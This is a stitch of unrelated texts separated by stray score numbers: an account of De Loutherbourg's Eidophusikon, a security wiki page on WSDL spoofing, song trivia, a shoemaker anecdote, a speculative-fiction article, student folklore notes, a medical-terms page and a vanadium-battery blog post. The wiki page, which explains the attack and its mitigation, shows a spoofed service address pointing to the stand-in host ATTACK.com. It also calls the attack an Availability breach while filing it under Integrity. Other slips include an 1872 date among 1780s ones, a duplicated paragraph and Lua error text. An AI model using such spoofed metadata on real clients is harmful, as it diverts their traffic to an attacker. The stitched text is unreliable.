To illuminate the interesting scenes for this display of nature, the ingenious projector had constructed his lights to throw their power in front of the scenes; and this plan might be tried with advantage for spectacles, and particular effects at least, on the great stages of our magnificent theatres. The lamps on De Loutherbourg’s stage were above the proscenium, and hidden from the audience, instead of being unnaturally placed as we are accustomed to see them, by which the faces of the performers are illuminated, like Michael Angelo’s Satan, from the regions below; thus throwing on their countenances a preternatural character, in defiance of all their well studied science of facial passion and expression. What painter ever dreamt of inverting the order of nature so entirely as to light the human countenance upwards? And why depart so strangely from truth upon the stage? The expression would be increased tenfold by lighting from above the proscenium. — For how infinitely more impressive is the emotion of the passions, when described with the spacious orbit of the eye in that deep shadow which the grand gusto of the historic style of painting has adopted — the majesty of intellectual intelligence is seen to rest upon the human brow. Nothing can outrage truth, or do so much violence to that delicate expression, which is the soul of acting, when addressed to the philosophical mind, as to view the bold projection of the chin, the subordinate and characteristic prominence of the nose, the upper part of the orbits of the eyes, instead of forming harmonious shadows, glaring in the blaze of stage-lamps, each a separate touch of light. Were the other method adopted for illuminating the stage, the scenes would recede, in their respective distances; the front and most prominent characters would cast a shadow on those in the second ground, and the general effect would assume the superior light and shadow of nature in manifold combinations, such as we behold on the historical groups of the great masters. Why should we continue to tolerate absurdities upon the stage, to the manifest injustice of those fine and masterly traits, as exhibited in the actor’s “anatomy of expression?” which might, but for this, serve as a school for the painter to study the rudiments of rage, anger, terror, guilt, jealousy, and other potent passions operating on the human visage, with that marked expression which the science of certain great actors can personate at will. Before the line of brilliant lamps, on the stage of the Eidophusikon, were slips of stained glass; yellow, red, green, purple, and blue: by the shifting of which, the painter could throw a tint upon the scenery, compatible with the time of day which he represented, and by a single slip, or their combinations, could produce a magical effect; thus giving a general hue of cheerfulness, sublimity, or awfulness, subservient to the phenomena of his scene. This too might be adopted on the regular stage, were the ingenious machinists of the scene-room to set their wits to work; and at no vast expence, since the improvements of lighting with gas. Gainsborough was so wrapt in delight with the Eidophusikon, that for a time he thought of nothing else — he talked of nothing else — and passed his evenings at that exhibition in long succession. Gainsborough, himself a great experimentalist, could not fail to admire scenes wrought to such perfection by the aid of so many collateral inventions. Loutherbourg’s genius was as prolific in imitations of nature to astonish the ear, as to charm the sight. He introduced a new art — the picturesque of sound. De Loutherbourg had tried many schemes to effect this; but none were satisfactory to his nice ear, until he caused a large skin to be dressed into parchment, which was fastened by screws to a circular frame, forming a vast tambourine; to this was attached a compact sponge that went upon a whalebone spring; which,s truck with violence, gave the effect of a near explosion; a more gentle blow, that of a far-off gun; and the reverberation of the sponge produced a marvellous imitation of the echo from to cloud, dying away into silence. The thunder was no less natural, and infinitely grand: a spacious sheet of thin copper was suspended by a chain, which, shaken by one of the lower corners, produced the distant rumbling, seemingly below the horizon; and as the clouds rolled on, approached nearer and nearer, increasing peal by peal, until, following rapidly the lightning’s zig-zag flash, which was admirably vivid and sudden, it burst in a tremendous crash immediately over-head. Once, being at the Eidophusikon, with a party of intelligent friends, when this scene was performing over Exeter ‘Change, I had the felicity to experience a most interesting treat. I had often wished for an opportunity to compare the effect of the awful phenomenon — a thunder storm, with this imitative thunder of De Loutherbourg’s. A lady exclaimed, “It lightens!” and, in great agitation, pointed to an aperture that admitted air to the upper seats. The consternation caused by this discovery, induced many to retire to the lobby, some of whom, moved by terror or superstition, observed, “that the exhibition was presumptuous.” We moved to the gallery, and opening a door, stood upon the landing place, where we could compare the real with the artificial storm. When the exhibition was over, and were tired to sup with one of our party, the worthy James Christie, in Pall Mall, we naturally went into the merits of this scenic display; when it was sagely determined, that man was an extraordinary creature, who could create a copy of Nature, to be taken for Nature’s self. But the most impressive scene, which formed the finale of the exhibition, was that representing the region of the fallen angels, with Satan arraying his troops on the banks of the Fiery Lake, and the rising of the Palace of Pandaemonium, as described by the pen of Milton. De Loutherbourg had already displayed his graphic powers in his scenes of fire, upon a great scale, at the public theatre — scenes which had astonished and terified [sic] the audience; but in this he astonished himself, — for he had not conceived the power of light that might be thrown upon a scenic display, until he made the experiment on his own circumscribed stage. Here, in the foreground of a vista, stretching an immeasurable length between mountains, ignited from their bases to their lofty summits, with many-coloured flame, a chaotic mass rose in dark majesty, which gradually assumed form until it stood, the interior of a vast temple of gorgeous architecture, bright as molten brass, seemingly composed of unconsuming and unquenchable fire. In this tremendous scene, the effect of coloured glasses before the lamps was fully displayed; which, being hidden from the audience, threw their whole influence upon the scene, as it rapidly changed, now to a sulphurous blue, then to a lurid red, and then again to a pale vivid light, and ultimately to a mysterious combination of the glasses, such as a bright furnace exhibits, in fusing various metals. The sounds which accompanied the wondrous picture, struck the astonished ear of the spectator as no less preternatural; for, to add a more awful character to peals of thunder, and the accompaniments of all the hollow machinery that hurled balls and stones with indescribable rumbling and noise, an expert assistant swept his thumb over the surface of the tambourine, which produced a variety of groans, that struck the imagination as issuing from infernal spirits. Such was De Loutherbourg’s Eidophusikon; and would that it were in being now, when the love of the fine arts has spread in so vast a degree! — that knowledge which would have appreciated its merits having increased a thousand-fold, since the period when the greatest scene-painter in the world was induced to dispose of his wondrous little stage, because the age could not produce amateurs sufficient, after two seasons, to muster an audience to pay for lighting his theatre! Comments: William Henry Pyne (1769-1843) was a British writer, painter and illustrator, who wrote under the pseudonym Ephraim Hardcastle. The Eidophusikon was the invention of Franco-British artist and scenery designer Philip James de Loutherbourg (1740-1812). It was a form of mechanical theatre, showing landscape pictures whose visual features changed through a system of pulleys, mirrors, coloured glass, with sound effects, though the exact mechanics are not known. There were three versions. The first was exhibited at De Loutherbourg’s home in Lisle Street, Leicester Square, London February-May 1781. The second, with additional scenes introduced, including the ‘Pandaemonium’ sequence, was exhibited January 1872 to some time in 1873. The third, that witnessed by Pyne, opened at Exeter Change on the Strand, London, in 1786. The venture was not a financial success, partly because De Loutherbourg could not keep up with audience demand for new scenes. The invention and its artworks do not survive. This entry was posted in 1780s, Memoirs, United Kingdom and tagged Artists, Audience, Eidophusikon, Fear, Lighting, London, Projection, Sound effects, W.H. Pyne. Bookmark the permalink. This is WONDERFUL! It is an incredibly helpful explanation of how the Eidophusikon worked. Thank you so much for posting this!!!! Glad to be of service. The chapter was a bit too long to give in full, but if you check the Hathi Trust link you’ll find the whole thing, with more descriptions of the effects. It shows a remarkable feat of memory on Pyne’s part, and makes you appreciate what a powerful impact the Eidophusikon clearly had. This is a fabulous description of the Eidophusikon, and a marvellous post. Readers interested in de Loutherbourg and his invention might want to seek out some good modern research in Christopher Baugh’s article “Philippe de Loutherbourg: Technology-Driven Entertainment and Spectacle in the Late Eighteenth Century”, in Huntington Library Quarterly, Vol. 70 (2007) No. 2, pp. 251 – 268, available through JSTOR and elsewhere. Baugh is particularly good on Loutherbourg’s work as an innovative set designer at the Drury Lane Theatre, as well as covering the Eidophusikon in detail. Loutherbourg’s home, where the spectacle was first shown, could evidently accommodate some 130 persons at a single viewing. This is wonderful, thank you for it. I am about to lead a candlelit attempt at this art in a local chapel in Suffolk, UK, on Saturday. I teach lighting history, so the lighting will change and the sea will glow. We are having live music and the whole afternoon will be non-electric. Anyone interested in coming along or seeing the resulting video or images, please reply. I’m delighted to hear about your recreation of this art. I hope it goes well. If you are going to have a link to images or video, do let me know.
0.998459
=Attack description= Before a web service client can communicate with other web services, the web service client has to retrieve information on how to invoke the the desired web service. That means data such as web service address, message format, required parameters or security requirements. All of this data is found in the metadata documents provided by the invoked web services server. The most common meta data documents are: *WSDL file[ *WS-Security-Policy When an attacker is able to maliciously alter these documents and spread them across web service clients, this attack is called [[Metadata Spoofing]] or [[Schema Poisoning]]. =Attack subtypes= The most common spoofing attacks are: *'''[[WSDL Spoofing]]''' <br> Maliciously changing the content of the WSDL file. This attack is also known as [[WSDL Parameter Tampering]]. *'''[[WS Security Policy Spoofing]]'''<br>Maliciously changing the content of the WSDL file. This usually aims at lowering the security requirements of an web service. I.e. the information that certain message data is required to be encrypted just gets removed, resulting in an unencrypted communication between web services, enabling the attacker to read the message content. =Prerequisites for attack= In order for this attack to work the attack has to have knowledge about the following thinks: #'''Attacker has access to the documents he wants to spoof.''' #'''Attacker is able to spread the spoof documents across web service clients that want to invoke the attacked web service. ''' =Graphical representation of attack= The attack is executed on the web service client. The web service intended to be invoked by the attacked web service client doesn't even have to be vulnerable to any attack. We just assume that an attacker is able to spoof the metadata documents of the web service the client wants to invoke. For an attacker three scenarios are possible in order to achieve his goal #Swapping of the original file on the attacked web service server with the spoofed file. #MITM scenarios, where an attacker alters the document in traffic, while the client retrieves the metadata document from the web services server. #The attacker swaps the file on the local machine of the web service client. Local access on the clients machine is required. In this scenario the reciving web service and the executed operation on the web service are as specified by the attacker in the spoofed document. [[Image:AttackedComponent_Metadata.png]] *Red = attacked web service component<br> *Black = location of attacker<br> *Blue = web service component not directly involved in attack.<br> =Attack example= Listing 1 contains a WSDL example [http://www.w3.org/2001/03/14-annotated-WSDL-examples.html] with a network address. Therefore all requests get forwarded to the web service located at the new network address specified by the attacker. <source lang="xml"> <!-- excerpt of WSDL FILE [http://www.w3.org/2001/03/14-annotated-WSDL-examples.html]--> <!-- wsdl:service names a new service "StockQuoteService" --> <wsdl:service name="StockQuoteService"> <wsdl:documentation>My first service</documentation> <!-- connect it to the binding "StockQuoteBinding" above --> <wsdl:port name="StockQuotePort" binding="tns:StockQuoteBinding"> <!-- give the binding an network address --> <!-- THE LOCATION WAS CHANGED FROM examples.com to ATTACK.com --> <soap:address location="http://ATTACK.com/stockquote"/> </wsdl:port> </wsdl:service> </wsdl:definitions> </source> Listing 1: Modified WSDL Document =Attack mitigation / countermeasures= As an web service client, it is important to check all metadata documents for authenticity prior to employing them. Up to now, no standardised method is defined to check for authenticity. Therefore web service developers still have to define proprietary solutions like signing of the metadata documents. =Attack categorisation= ==Categorisation by violated security objective== The attack aims at exhausting the system resources, therefore it violates the security objective Availability. [[Category:Attack_Categorisation_By_Violated_Security_Objective_Integrity]] [[Category:Attack_Categorisation_By_Violated_Security_Objective]] *[[:Category:Attack_Categorisation_By_Violated_Security_Objective_Integrity]] *[[:Category:Attack_Categorisation_By_Violated_Security_Objective]] ==Categorisation by number of involved parties== [[Category:Attack_Categorisation_By_Number_Of_Involved_Parties:1_-_0_-_1]] [[Category:Attack_Categorisation_By_Number_Of_Involved_Parties]] *[[:Category:Attack_Categorisation_By_Number_Of_Involved_Parties:1_-_0_-_1]] *[[:Category:Attack_Categorisation_By_Number_Of_Involved_Parties]] ==Categorisation by attacked component in web service architecture== [[Category:Attack_Categorisation_By_Attacked_Web_Service_Component:_Web_Service_Client]] [[Category:Attack_Categorisation_By_Attacked_Web_Service_Component]] *[[:Category:Attack_Categorisation_By_Attacked_Web_Service_Component:_Web_Service_Client]] *[[:Category:Attack_Categorisation_By_Attacked_Web_Service_Component]] ==Categorisation by attack spreading== [[Category:Attack_Categorisation_By_Attack_Spreading]] [[Category:Attack_Categorisation_By_Attack_Spreading:Conceptual_Flaws]] *[[:Category:Attack_Categorisation_By_Attack_Spreading]] *[[:Category:Attack_Categorisation_By_Attack_Spreading:Conceptual_Flaws]] =References= # Meiko Jensen, Nils Gruschka, and Ralph Herkenh ̈ner. A survey of attacks on web services. Springer-Verlag, 2009. # Meiko Jensen.Attacking webservices. http://www.nds.rub.de/media/nds/downloads/ws0910/AttackingWebServices.pdf, 2010. Accessed 01 July 2010.
0.928361
The phrase "Que Sera, Sera" came from a movie called The Barefoot Contessa, where the character Rossano Brazzi's family motto was "Che Sera, Sera." The motto in the film was Italian, but Evans and Livingston switched the "Che" to "Que" because more people spoke Spanish in the US. This became Doris Day's biggest hit and her signature song, but she didn't want to record it because she thought of it as a children's song. Livingston explained in Zollo's interview: "She didn't want to record it but the studio pressured her. She did it in one take and said, 'That's the last you're going to hear of this song.'" Ray Evans and Jay Livingston also wrote the theme song to the TV show Mr. Ed, which was about a talking horse (Livingston sang on that one). Some of their other compositions include "Mona Lisa" and the Christmas classic "Silver Bells." * According to Billboard the week it entered the Top 100 at #78 it was actually tied with Gale Storm's covered version of "Why Do Fools Fall in Love" and for the two weeks it was at #2, the #1 record for both those weeks was "My Prayer" by the Platters. Gary from Tucson, AzShe also sang a bit of this song with Arthur Godrey in "The Glass Bottom Boat." Dean from Hoover, AlOne of my favorite songs! Barry from Sauquoit, NyDoris Day had a big hit in 1953 with "Secret Love"; it also won an Academy Award for Best Song!!! Steve Dotstar from Los Angeles, CaLivingston and Evans can be seen performing at a party(at the piano) in the movie "Sunset Blvd"(1950)Paramount. They even get billing with the other actors on the Main Title! Cyberpope from Richmond, CanadaFunny; the original, Italian, title lyric meant "What an evening!"; in Spanish it doesn't all translate. . . Manda from Oc, CaSo, tell me why iTunes has a 'clean' and 'explicit' version of this song? Chris from Ozona, United StatesI heard an 80 year old man playing this the other day on a broken down piano in a thrift shop. I think it was the most beautiful music I have heard in a long while. A hauntingly beautiful c-major waltz! I also snagged an amazing album by Doris Day called "Day by Day" on an earlier visit. Ethan from HelsinkiThis song was also played by Pink Martini, whose version was in an episode of Dead Like Me. Hannah from Madison, WiI don't think the ending of "The Man Who Knew Too Much" is idiotic at all. I think it is touching and an ingenious plot element. Just because you can't direct a film like Mr. Hitchcock doesn't mean you should criticize him. Go back to the hole in Virginia that you crawled out of. Robert from Nyc, NyThis song was written by Bernard Herrmann who scored the movie. Ray and Jay did the lyrics. I know Benny Herrmann was my uncle. James from Brisbane, AustraliaLong before Ray Evans and Jay Livingston, in 1588 Christopher Marlowe (1564-1593) in his play 'Doctor Faustus' wrote "Che sera, sera, What will be, shall be". Perhaps Messrs Evans and Livingston just happened to be thumbing through the old English classics and thought this was the cue for a song. Don from Newmarket, CanadaSung in the Simpson's episode when a comet threatens to destroy Springfield. Dennis from Chicagoland Burrows, IlThis song's in the "Heathers" at the beginning, with the croquet! Kevin from Cincinnati, OhSly and the Family Stone did a copy of this song on an album called Fresh in the 70s.I like Sly but the cover of this song i don't care for. Wes from Springfield, VaThe end of the Hitchcock movie is pretty idiotic, wherein Doris bellows this tune at the top of her lungs to alert her son of her presence.
0.998673
His name was Francisco Carreira and he was a shoemaker. His shop was a small, dark, windowless room, with a low door through which only children could enter without bending down, because it must have been, at most, about three or four feet high. He was always there, sitting on a stool behind a bench on which were laid out all the tools of his trade and which was covered with an ancient layer of dust and detritus: bent nails, shavings from soles, a blunt needle, a pair of broken pliers. He was a sick man, old before his time, with a deformed spine. All his strength was concentrated in his arms and shoulders, as strong as levers, and with them he could hammer on the sole of a shoe, wax the thread, pull the stitches tight and drive the tacks home with two short unerring blows. While I amused myself making holes in a piece of shoe leather with a punch or played with the water to which the soles of shoes, left to soak, lent an astringent touch of tannin, he would tell me tales of his youth: vague political plots, a pistol that had been shown to him as a somber warning of what, word of honor, would happen to any traitor of the cause. Then he would ask me how school was going, what news I had of events in Lisbon, and I would waffle on as best I could to satisfy his curiosity. One day, he seemed preoccupied. He smoothed his thin hair with his bradawl and paused in his sewing, both of which were familiar signs, heralding a particularly important question. Shortly afterward, Francisco Carreira leaned back his twisted body, pushed his glasses up onto his forehead and fired at point-blank range: "Do you believe in the plurality of worlds?" He had read Fontenelle, and I had not, anything I did know having been gleaned from overhearing someone else discussing his work. I muttered something about the movement of the stars, mentioned Copernicus just in case, and that was that. But basically, yes, I did believe in the plurality of worlds, the main question being: was there anyone out there? He seemed pleased, or so it seemed to me, and I breathed a sigh of relief. Many years later, I wrote an article about him to which I gave the Lorca-inspired title, "The Prodigious Shoemaker." What other adjective could I have used? A shoemaker in my village, in the 1930s, talking about Fontenelle.
0.940959
Speculative fiction is an umbrella genre encompassing fiction with certain elements that do not exist in the real world, often in the context of supernatural, futuristic or other imaginative themes. This includes, but is not limited to, science fiction, fantasy, superhero fiction, horror, utopian and dystopian fiction, fairytale fantasy, supernatural fiction as well as combinations thereof (e.g. science fantasy). Speculative fiction as a category ranges from ancient works to both paradigm-changing and neotraditional works of the 21st century. Speculative fiction can be recognized in works whose authors' intentions or the social contexts of the versions of stories they portrayed are now known, since ancient Greek dramatists such as Euripides (ca. 480–406 BCE) whose play Medea seems to have offended Athenian audiences when he fictionally speculated that shamaness Medea killed her own children instead of their being killed by other Corinthians after her departure, and whose play Hippolytus, narratively introduced by Aphrodite, Goddess of Love in person, is suspected to have displeased his contemporary audiences because he portrayed Phaedra as too lusty. In historiography, what is now called speculative fiction has previously been termed "historical invention", "historical fiction", and similar names. It is extensively noted in literary criticism of the works of William Shakespeare as when he co-locates Athenian Duke Theseus and Amazonian Queen Hippolyta, English fairy Puck, and Roman god Cupid across time and space in the Fairyland of its Merovingian Germanic sovereign Oberon in A Midsummer Night's Dream. In mythography the concept of speculative fiction has been termed "mythopoesis" or mythopoeia, "fictional speculation", the creative design and generation of lore, regarding such works as J. R. R. Tolkien's The Lord of the Rings. Such supernatural, alternate history and sexuality themes continue in works produced within the modern speculative fiction genre. The creation of speculative fiction in its general sense of hypothetical history, explanation, or ahistorical storytelling has also been attributed to authors in ostensibly non-fiction mode since as early as Herodotus of Halicarnassus (fl. 5th century BCE), in his Histories, and was already both practiced and edited out by early encyclopaedic writers like Sima Qian (ca. 145 or 135 BCE–86 BCE), author of Shiji. These examples highlight the caveat that many works now regarded as intentional or unintentional speculative fiction long predate the coining of the genre term; its concept in its broadest sense captures both a conscious and unconscious aspect of human psychology in making sense of the world, and responding to it by creating imaginative, inventive, and artistic expressions. Such expressions can contribute to practical progress through interpersonal influences, social and cultural movements, scientific research and advances, and philosophy of science. In its English-language usage in arts and literature since the mid 20th century, "speculative fiction" as a genre term is often attributed to Robert A. Heinlein. He first used the term in an editorial in The Saturday Evening Post, February 8, 1947. In the article, Heinlein used "Speculative Fiction" as a synonym for "science fiction"; in a later piece, he explicitly stated that his use of the term did not include fantasy. However, though Heinlein may have come up with the term on his own, there are earlier citations: a piece in Lippincott's Monthly Magazine in 1889 used the term in reference to Edward Bellamy's Looking Backward: 2000–1887 and other works; and one in the May 1900 issue of The Bookman said that John Uri Lloyd's Etidorhpa, The End of the Earth had "created a great deal of discussion among people interested in speculative fiction". A variation on this term is "speculative literature". The use of "speculative fiction" in the sense of expressing dissatisfaction with traditional or establishment science fiction was popularized in the 1960s and early 1970s by Judith Merril and other writers and editors, in connection with the New Wave movement. It fell into disuse around the mid-1970s. The Internet Speculative Fiction Database contains a broad list of different subtypes. In the 2000s, the term came into wider use as a convenient collective term for a set of genres. However, some writers, such as Margaret Atwood, continue to distinguish "speculative fiction" specifically as a "no Martians" type of science fiction, "about things that really could happen." Academic journals which publish essays on speculative fiction include Extrapolation, and Foundation. According to publisher statistics, men outnumber women about two to one among English-language speculative fiction writers aiming for professional publication. However, the percentages vary considerably by genre, with women outnumbering men in the fields of urban fantasy, paranormal romance and young adult fiction. "Speculative fiction" is sometimes abbreviated "spec-fic", "specfic", "S-F", "SF" or "sf". However, the last three abbreviations are ambiguous as they have long been used to refer to science fiction (which lies within this general range of literature) and in several other contexts. The term has been used by some critics and writers dissatisfied with, what they consider, the limitations of science fiction: i.e., a need for the story to hold to strict scientific principles. They feel the term "Speculative Fiction" better defines an expanded, open, imaginative fiction, stories typically dismissed as "genre fiction", such as "Fantasy," "Mystery," "Horror," "Science Fiction," etc. Harlan Ellison used the term to avoid being pigeonholed as a writer. Ellison broke out of genre conventions, a fervent proponent of writers embracing more literary and modernist directions, to push the boundaries of "Speculative Fiction." ^ "speculative fiction". Dictionary.com Unabridged. Random House. ^ "逆援助紹介PARADOX!". paradoxmag.com. Archived from the original on 2010-07-28. ^ "Mark Wagstaff – Historical invention and political purpose | Re-public: re-imagining democracy – english version". Re-public.gr. 2005-01-17. Archived from the original on 2013-01-16. Retrieved 2013-02-10. ^ Jona Lendering. "Herodotus of Halicarnassus". Livius.org. Retrieved 2013-02-10. ^ "Dictionary citations for the term "speculative fiction"". Jessesword.com. 2009-04-28. Retrieved 2013-02-10. ^ "The Speculative Literature Foundation". Speculativeliterature.org. Retrieved 2013-02-10. ^ "New Wave". Virtual.clemson.edu. Retrieved 2013-02-10. ^ Atwood, Margaret (2011). In Other Worlds: SF and the Human Imagination. New York: Nan A. Talese/Doubleday. p. 6. ISBN 9780385533966. ^ "PLACEHOLDER - foundation | The Science Fiction Foundation". Sf-foundation.org. 2010-12-31. Retrieved 2013-02-10. ^ Crisp, Julie (10 July 2013). "SEXISM IN GENRE PUBLISHING: A PUBLISHER'S PERSPECTIVE". Tor Books. Archived from the original on 30 April 2015. Retrieved 29 April 2015. ^ "A Speculative Fiction Blog". SFSignal. Retrieved 2013-02-10. ^ Rodger Turner, Webmaster. "The Best in Science Fiction and Fantasy". The SF Site. Retrieved 2013-02-10. ^ "Citations and definitions for the term "speculative fiction" by speculative fiction reviewers". Greententacles.com. Retrieved 2013-02-10. ^ "Watts, Peter. "Margaret Atwood and the Hierarchy of Contempt", ''On Spec'' 15(2) (Summer 2003)" (PDF). pp. 3–5. Retrieved 2013-02-10. Wikimedia Commons has media related to Speculative fiction. This page was last edited on 7 April 2019, at 06:48 (UTC).
0.959423
Background: I had approached Hannah about telling me about her family Passover tradition that she had fleetingly mentioned at Shabbat Dinner at Hillel at the University of Southern California. She had talked about a hazelnut game for children during Passover that is unique to her family. Hannah goes to her grandparent’s house for the first night of Passover and celebrates the second night at her great-aunts house. She is from Illinois. Context: I interviewed Hannah in the dining room of our sorority house, Delta Delta Delta. It was right after dinnertime so the dining room was full of people with coffee or tea chatting in the background of our conversation. Reflection: I am Jewish and grew up in Los Angeles going to Jewish day school. I have never heard of a tradition like this one, from my friends or family. Background: I had approached Hannah about telling me about her family Passover tradition that she had fleetingly mentioned at Shabbat Dinner at Hillel at the University of Southern California. She had talked about a hazelnut game for children during Passover that is unique to her family. Hannah goes to her grandparent’s house for the first night of Passover and celebrates the second night at her great-aunt’s house. She is from Illinois. Context: I interviewed Hannah in the dining room of our sorority house, Delta Delta Delta. It was right after dinner so the dining room was full of people with coffee or tea chatting in the background of our conversation. After Hannah shared her family tradition of the hazelnut game (published under the title “The Cremer Family’s Passover Hazelnut Game”) I asked her if her family has any other family traditions for Passover. She then shared the tradition of individual afikomen. “Mang-tae-gi-hal-a-buh-ji will come kidnap disobedient children!” (말 안 듣는 아이는 망태기 할아버지가 잡으러 온다!) is a phrase that makes all Korean children shiver in fear. Mang-tae-gi-hal-a-buh-ji means grandpa (hal-a-buh-ji) of net bag (mang-tae-gi). The net bag was widely used during the pre-modern times and is made from weaving hay together like a net, making a tightly knit bag for carrying goods such as crops. There are stories of the Mang-tae-gi-hal-a-buh-ji kidnapping children either to scold them and return them back, never let them return or cannibalizing on them. It is commonly thought that the origin of the Mang-tae-gi-hal-a-buh-ji is of old men that were leprous carrying the Mang-tae-gi bag. There was a belief of being able to be cured of leprosy through boiling and eating a child. I collected this from my mother, who has numerously used the name of Mang-tae-gi-hal-a-buh-ji in the past in order to get me to become more obedient. This is significant to my mother has herself has also been subjected to this superstition by her own mother. My grandmother, despite being a devout catholic woman, made sure to track all superstitions to keep my then unborn twin cousins safe from harm. One of them involved giving the yet to be born child no pre-birth name (태명/ Tae-myeong) or intentionally giving them a very bad pre-birth name. This was because of the superstition of when one gives a good pre-birth names to children, evil spirits that are around, including Mang-tae-gi-hal-a-buh-ji, will try to inflict harm on the good child. By downplaying the child through a bad pre-birth name, one is able to avoid the attention from these unwanted evil spirits. My twin cousins were given pre-birth names of Ddol-ddol-I (똘똘이) which means someone that is somewhat bright. Not the worst, but not good enough for evil spirits I guess. Mang-tae-gi-hal-a-buh-ji can be compared to the Boogeyman, another mythical creature that is used to frighten children into good behavior. By instilling fear of disobeying, the parents can control the child much easier. However, despite using the name of Mang-tae-gi-hal-a-buh-ji to scare children, the parents themselves also take caution against the evil spirit by taken on traditions such as giving no pre-birth names or bad pre-birth names. The three year mountain pass (삼년고개/ sam-nyeon-go-gae) is a traditional Korean folk tale. I collected this from my high school friend who lives in Shanghai, China. Despite living abroad, I was amazed when I went over to his house because his bookshelf was filled with Korean children’s folktales. He stated in the interview that because he moved abroad to Shanghai at a young age of three, his parents feared that he would lose to ability to speak Korean or not be able to identify renowned traditional stories. So his father made sure to always buy books when he traveled back to Korea for business and carry them back in suitcases. Because he is the youngest child from both the maternal and paternal side of the family, he states that he has no younger cousins to give the books to so he plans to make sure his children read the same books as he did. This story is significant to only only my friend, but to many people that attended Korean pre-school, kindergarten or elementary school, as the three-year mountain pass is one of the first stories children learn. The tale of the three-year mountain pass, promotes thinking outside of box. If it was not for the grandson looking at the problem from a different angle, the grandfather would have passed away due to being fixated on the thought of only having three-years left in his life. It can also be interpreted to think simple, as the simple mind process of the child was what was able to save the grandfather. Additional interesting factors are that this is a tale that is intended for children but it is a story of a child saving the day, despite the lack of knowledge and wisdom. It can have a moral to parents of not completely disregarding the children’s input on a situation, as well as showing kids that its okay to have courage to say what they believe is right to their parents. On a final note, the story also has themes of worrying about impending doom, as the grandfather lies ill for the three years. The story gives a moral of not wasting times worrying about the impending doom as although the grandfather laid ill for three years, there was no information about the three years, implying that they all went to waste due to there being no relevant information during the three years, other than the fact that he was ill, to show that the grandfather did nothing significant for years due worrying about a factor that he thought he could not influence. Informant is a first year acting student at the University of Southern California. She was born in Medellin, Colombia, grew up in the San Francisco Bay Area, and at age 12 she moved to Paris and later Hong Kong. She spends her winter and summer vacations with her family in Colombia. I asked the informant about how she celebrates Christmas, and this was her response. When asked how she celebrates Christmas, the informant shared that in her family, the belief is that baby Jesus himself brings you one present, typically the biggest one you asked for, and he leaves it underneath your bed. She still said Santa brings other presents, but the biggest one comes from Jesus. Unlike the typical belief that Santa Claus comes through the chimney and delivers all the presents under the tree, the informant added onto this and said that for her family in Colombia, baby Jesus himself is responsible for bringing the biggest or most important presents. Santa is still responsible for bringing other gifts (see also “Celebrating Christmas on December 24th”), but her family wanted to emphasize the fact that Christmas is a celebration of the birth of Jesus by having him bring the present that they most looked forward to. Christmas seems to get more and more commercialized each year, and this addition is a simple reminder of what the holiday is about at its core. Informant is a first year student at the University of Southern California who grew up in Seattle, Washington. She learned this song at elementary school as a child. The informant was telling me that she had a song from her childhood stuck in her head all day. I asked her which one she was referring to, and she then sang this. This song was such a familiar piece of the informant’s childhood, and seemingly everyone who grew up around her also knew it. Additionally, some of the informant’s friends who did not grow up anywhere near Seattle knew this song, with maybe some slight variations, and even those who did not know this specific song had their own version with a similar rhyme scheme or tune.
0.977438
In many cases, terms such as disease, disorder, morbidity and illness are used interchangeably. There are situations however when specific terms are considered preferable. The term disease broadly refers to any condition that impairs the normal functioning of the body. For this reason, diseases are associated with dysfunctioning of the body's normal homeostatic process. Commonly, the term disease is used to refer specifically to infectious diseases, which are clinically evident diseases that result from the presence of pathogenic microbial agents, including viruses, bacteria, fungi, protozoa, multicellular organisms, and aberrant proteins known as prions. An infection that does not and will not produce clinically evident impairment of normal functioning, such as the presence of the normal bacteria and yeasts in the gut, or of a passenger virus, is not considered a disease. By contrast, an infection that is asymptomatic during its incubation period, but expected to produce symptoms later, is usually considered a disease. Non-infectious diseases are all other diseases, including most forms of cancer, heart disease, and genetic disease. A medical condition is a broad term that includes all diseases, lesions and disorders. While the term medical condition generally includes mental illnesses, in some contexts the term is used specifically to denote any illness, injury, or disease except for mental illnesses. The Diagnostic and Statistical Manual of Mental Disorders (DSM), the widely used psychiatric manual that defines all mental disorders, uses the term general medical condition to refer to all diseases, illnesses, and injuries except for mental disorders. This usage is also commonly seen in the psychiatric literature. Some health insurance policies also define a medical condition as any illness, injury, or disease except for psychiatric illnesses. Mental illness is a broad, generic label for a category of illnesses that may include affective or emotional instability, behavioral dysregulation, and/or cognitive dysfunction or impairment. Specific illnesses known as mental illnesses include major depression, generalized anxiety disorder, schizophrenia, and attention deficit hyperactivity disorder, to name a few. Mental illness can be of biological (e.g., anatomical, chemical, or genetic) or psychological (e.g., trauma or conflict) origin. It can impair the affected person's ability to work or study and can harm interpersonal relationships. The term insanity is used technically as a legal term. Classical classification of human disease derives from observational correlation between pathological analysis and clinical syndromes. Today it is preferred to classify them by their aetiology if it is known. Communicable – an infection that can spread from one person to another, but is not usually spread through everyday contact, such as the viral hepatitis. A non-communicable disease is a medical condition or disease that is non-transmissible. Non-communicable diseases cannot be spread directly from one person to another. Heart disease and cancers are examples of non-communicable diseases in humans. ↑ 29.0 29.1 29.2 29.3 Lua error in Module:Citation/CS1/Identifiers at line 47: attempt to index field 'wikibase' (a nil value). ↑ 31.0 31.1 Lua error in Module:Citation/CS1/Identifiers at line 47: attempt to index field 'wikibase' (a nil value). This page was last modified on 11 January 2016, at 23:23.
0.928473
Oxygentax: Clean energy outside of Nuke or Hydro? A couple days after the Uranium Development Partnership released it's public consultation report, and all of the Greenies are crying out in victory for their particular favourites - "renewable energy" - things like wind and solar - energy which, while being clean, is definitely not "renewable". The problem with these forms of energy until now has been that they are not suitable for base load power - because the sun doesn't necessarily shine all the time, because the wind doesn't necessarily blow all the time, the output of these sources of energy would fluctuate too radically to ensure that the base load power would be covered with just these forms, meaning that they can not reliably replace ANY of the existing plants. I was reminded of an article I read in the National Post approximately a month ago about an advance in battery technology which might solve the problems with installing wind and solar as baseload power. The advance makes use of the element Vanadium, and seems to be a promising way to not only store energy, but also to use in electric vehicles and other applications. Sounds great, right? There is one problem - Vanadium is not found in large quantities on it's own, and the processes which produce and purify the element aren't things that the Greenies would like - steel smelting, processing uranium and burning fossil fuels. So, given this choice, which do you think the Greens would embrace, the nuclear option, or the use of a highly toxic element to create batteries to allow for their "clean" energy options to be installed as baseload?
0.999998
